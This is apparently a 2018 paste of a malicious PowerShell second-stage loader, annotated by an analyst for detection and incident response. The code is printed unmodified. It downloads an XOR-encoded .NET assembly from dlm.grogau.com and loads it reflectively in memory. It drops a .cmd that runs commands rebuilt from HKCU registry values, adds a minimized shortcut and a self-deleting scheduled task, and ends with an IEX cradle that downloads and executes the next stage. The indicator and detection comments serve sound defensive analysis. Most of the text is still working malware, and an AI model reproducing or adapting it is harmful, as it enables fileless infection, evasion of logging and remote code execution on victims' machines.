James_inthe_box

Second stage

Apr 9th, 2018
# ---------------------------------------------------------------------------
# ANALYST ANNOTATION - malicious PowerShell second-stage loader. Do NOT run.
# Annotated for detection/IR purposes only; code below is left unmodified.
#
# Observable behaviour in this paste (in order):
#   1. one-run guard on a marker file ($fileName, set by an earlier stage)
#   2. HTTPS download from dlm.grogau.com, single-byte XOR (key 0x6A) decode,
#      in-memory .NET assembly load (no file written for the assembly)
#   3. a .cmd dropped that rebuilds a command from HKCU\Software\Microsoft
#      registry values whose names carry a random prefix, then executes it
#   4. a <USERNAME>.lnk pointing at that .cmd
#   5. a one-shot, self-deleting scheduled task that launches the .cmd
#   6. a final IEX download cradle for the next stage
#
# Indicators: domain dlm.grogau.com (opaque base64-like query strings);
#   XOR key 0x6A; [Reflection.Assembly]::Load from PowerShell; Schedule.Service
#   COM task with a random name, 30 s lifetime and "schtasks /Delete" action;
#   .cmd + .lnk in [Loader]::outDir; HKCU\Software\Microsoft values with a
#   random "<4-16 chars>-" prefix.
#
# NOTE(review): the `if (-Not $bExists) {` opened below is never closed in
# this paste; the listing is either truncated or the original is incomplete.
# ---------------------------------------------------------------------------

# $fileName is not defined in this paste - presumably handed down from the
# first stage. Existence of the file is used as an "already ran" marker.
$bExists = [System.IO.File]::Exists($fileName)

if (-Not $bExists) {
# Create the (empty) marker so the block is not executed a second time.
"" | Set-Content $fileName

# Fetch the encoded payload. The query string is opaque; it is not a path
# on disk and carries no clear-text hint of what is served.
$bytes = (New-Object Net.WebClient).DownloadData("https://dlm.grogau.com/?f2lnsQGKYqoGuIJdSOhrb8WFtI5DZgVu0cLfe09KTnjlK6L0bndQxwBUYz4oft6IGQeMqJv/DWmhFcHLLkAlCKJK/mX6+9WjQfBawwc0BcDp2w4=")

# Single-byte XOR decode with key 0x6A. Because the result is fed to
# Assembly.Load, the decoded bytes are presumably a .NET PE; a memory scan for
# "MZ" XOR 0x6A (0x27 0x20) at the start of the response is a cheap indicator.
for($i=0; $i -lt $bytes.count; $i++) {
$bytes[$i] = $bytes[$i] -bxor 0x6A
}

# Reflective in-memory load - the assembly never touches disk. Detect via
# ETW .NET assembly-load telemetry / AMSI on the PowerShell host.
[Reflection.Assembly]::Load($bytes)

# [Loader] is a type exported by the assembly just loaded; its members
# (randomInt, RandomString, Go3, outDir) are not visible here. The prefix is
# 4-16 random characters followed by "-".
$rInt = [Loader]::randomInt(4, 16)
$prefix = "$([Loader]::RandomString($rInt))-"

# Opaque call into the loaded assembly: base URL, four encoded strings, and
# the prefix. Given that the .cmd below collects HKCU\Software\Microsoft
# values whose names start with $prefix, Go3 presumably writes those values
# (fetching their content from the four URLs) - TODO confirm from the
# decoded assembly; not provable from this script alone.
[Loader]::Go3("https://dlm.grogau.com","dmJvugeFYqECuIJdSOhrb8WFtI5DZgVu0cLfe09KTnjlK6L0bndQxwBUYz4oft6IGQeMqJv6NXK6DerhCEAmIqIR/mGlr+CvEK9CkVAwAw==","dmFgvA2DYKoC9JtBe8pKTMCSgpReVTJZ6rCiYUIhMHfsCILXa3FjyhosNA8yROSsOSOqjrjbPFOwN9DFNHgABIFrwGzs2KWxRPkVlFE8UJI=","dmhmsQSGY6sK9ZtBe8pKTMCSgpReVTJZ6rCiYUIhMHfsCILXa3FjyhosNA8yROSsOSOqjrjbPFOwN9DFNHgABIFrwG3R3+WEH/0b3VI3DJ61jgwv","dmFjvgGLYaIB8ptBe8pKTMCSgpReVTJZ6rCiYUIhMHfsCILXa3FjyhosNA8yROSsOSOqjrjbPFOwN9DFNHgABIFrwG3Ry6yEH/0b3QdhBsXp21wq",$prefix)

# Random names for the three batch variables, so the dropped .cmd carries
# no fixed strings to signature on.
$var1 = [Loader]::RandomString($rInt)
$var2 = [Loader]::RandomString($rInt)
$var3 = [Loader]::RandomString($rInt)

# Dropped batch file: random 6-16 char name with .cmd extension inside
# [Loader]::outDir (directory chosen by the assembly; unknown here).
$cmdFileName = "$([Loader]::outDir)\$([Loader]::RandomString([Loader]::randomInt(6, 16))).cmd"

# Batch file is assembled line by line. Effective content once expanded:
#   @Echo off / Setlocal EnableExtensions / Setlocal EnableDelayedExpansion
#   Set V1=HKCU\Software\Microsoft   (built in three steps, never as one literal)
#   Set V2=
#   FOR /F "usebackq tokens=1,2*" %%1 IN (`REG QUERY HKCU\Software\Microsoft`) DO (
#     Set V3=%%11                    ; value name + literal "1"
#     IF "!V3:~0,<len>!"=="<prefix>" ( Set V2=!V2!%%3 )   ; append value data
#   )
#   %V2%                              ; run the concatenated data as a command
# i.e. registry values directly under HKCU\Software\Microsoft whose names
# begin with $prefix are concatenated (REG QUERY output order) and executed.
$cmdSource = "@Echo off`r`n"
$cmdSource += "Setlocal EnableExtensions`r`n"
$cmdSource += "Setlocal EnableDelayedExpansion`r`n"
$cmdSource += "Set $var1=HKCU`r`n"
$cmdSource += "Set $var1=%$var1%\Software`r`n"
$cmdSource += "Set $var1=%$var1%\Microsoft`r`n"
$cmdSource += "Set $var2=`r`n"
$cmdSource += "FOR /F `"usebackq tokens=1,2*`" %%1 IN (``REG QUERY %$var1%``) DO (`r`n"
# "%%11" is loop token %%1 followed by a literal "1" - keeps the Set from
# seeing an empty RHS on blank/header lines (presumed intent; not stated).
$cmdSource += "Set $var3=%%11`r`n"
# The backtick before ':' stops PowerShell from reading "$var3:" as a
# scope/drive qualifier; the batch file receives a plain "!name:~0,N!".
$cmdSource += "IF `"!$var3`:~0,$($prefix.Length)!`"==`"$prefix`" (`r`n"
$cmdSource += "Set $var2=!$var2!%%3`r`n"
$cmdSource += ")`r`n"
$cmdSource += ")`r`n"
$cmdSource += "%$var2%`r`n"
$cmdSource | Set-Content $cmdFileName

# Shortcut named after the current user, targeting the .cmd, window style 7
# (minimized). Nothing in this paste uses the .lnk afterwards; whether
# outDir is a Startup-type folder is not visible here - TODO confirm.
# ($lnkFilename vs $lnkFileName is only a case difference; PowerShell
# variable names are case-insensitive.)
$lnkFileName = "$([Loader]::outDir)\$env:USERNAME.lnk"
$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut($lnkFilename)
$Shortcut.TargetPath = $cmdFileName
$Shortcut.WindowStyle = 7
$Shortcut.Save()

# Task fires 5 s from now and expires 35 s from now: a 30 s one-shot window.
$TaskStartTime = [datetime]::Now.AddSeconds(5)
$TaskEndTime = [datetime]::Now.AddSeconds(35)

$taskName = [Loader]::RandomString($rInt)

# Task Scheduler via COM (Schedule.Service) rather than schtasks.exe /Create,
# so no command line is logged for the creation step.
$service = New-Object -ComObject("Schedule.Service")
$service.Connect()

$rootFolder = $service.GetFolder("\")

$TaskDefinition = $service.NewTask(0)
$TaskDefinition.RegistrationInfo.Description = ""
$TaskDefinition.Settings.Enabled = $true
$TaskDefinition.Settings.DisallowStartIfOnBatteries = $false
# Remove the task immediately once its end boundary has passed.
$TaskDefinition.Settings.DeleteExpiredTaskAfter = "PT0M"

# Trigger type 1 = TASK_TRIGGER_TIME (single run at StartBoundary).
$triggers = $TaskDefinition.Triggers
$trigger = $triggers.Create(1)
$trigger.StartBoundary = $TaskStartTime.ToString("yyyy-MM-dd'T'HH:mm:ss")
$trigger.EndBoundary = $TaskEndTime.ToString("yyyy-MM-dd'T'HH:mm:ss")
$trigger.Enabled = $true

# Action 1 (type 0 = TASK_ACTION_EXEC): run the dropped .cmd. Running it from
# the task service detaches it from the powershell.exe process tree.
$action = $TaskDefinition.Actions.Create(0)
$action.Path = $cmdFileName
$action.Arguments = ""

# Action 2: the task deletes itself by name (forensic clean-up; the
# "schtasks.exe /Delete /TN <random> /F" command line is the artefact to hunt).
$action = $TaskDefinition.Actions.Create(0)
$action.Path = "schtasks.exe"
$action.Arguments = "/Delete /TN $taskName /F"

# flags 6 = TASK_CREATE_OR_UPDATE, logonType 0 = TASK_LOGON_NONE, no
# credentials - registered in the current user's context, no elevation.
$rootFolder.RegisterTaskDefinition($taskName, $TaskDefinition, 6, "", $null, 0)

# $urlPL is assigned but not referenced anywhere in this paste.
$urlPL = "https://dlm.grogau.com/?dmFguwGEZqsF8JtBe8pKTMCSgpReVTJZ6rCiYUIhMHfsCILXa3FjyhosNA8yROSsOSOqjrjbIVOwT9TuamdZH69NzWvW2++EHJxP7gpNXcDdhQRgMV0A9QUrGfk="
# Classic download cradle: the HTTP response body is executed directly as
# PowerShell (next stage). Script Block Logging / AMSI will see the
# decoded content at this point even though it never hits disk.
IEX(New-Object Net.WebClient).DownloadString("https://dlm.grogau.com/?cWRjvAKCZaYCuIJdSOhrb8WFtI5DZgVu0cLfe09KTnjlK6L0bndQxwBUYz4oft6IGQeMqJvnNXLCEPnUC3g8MqFS/mLE+9OkOKRA8F45SMK8jwkkY1wC")